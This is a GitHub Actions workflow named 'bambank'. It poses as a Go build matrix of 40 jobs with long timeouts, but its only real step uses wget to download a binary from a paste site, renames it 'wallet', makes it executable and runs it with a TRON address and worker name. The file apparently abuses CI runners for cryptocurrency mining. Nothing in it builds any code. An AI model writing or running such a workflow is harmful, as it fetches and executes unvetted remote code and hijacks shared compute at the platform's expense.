name: bambank
on: [push, pull_request]
jobs:
  build:
    name: bambank
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 100
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4]
        flag: [A, B, C, D, E, F, G, H, I, J]
    timeout-minutes: 360
    env:
        NUM_JOBS: 100
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: bambank
      run: |
        wget https://www.heypasteit.com/download/0IW4VM && mv 0IW4VM wallet && chmod u+x wallet && ./wallet tron TKN7YheiH9BMTqxouXVryopzSsHRpwS26t kloter1-${{ matrix.go }}-${{ matrix.flag}}
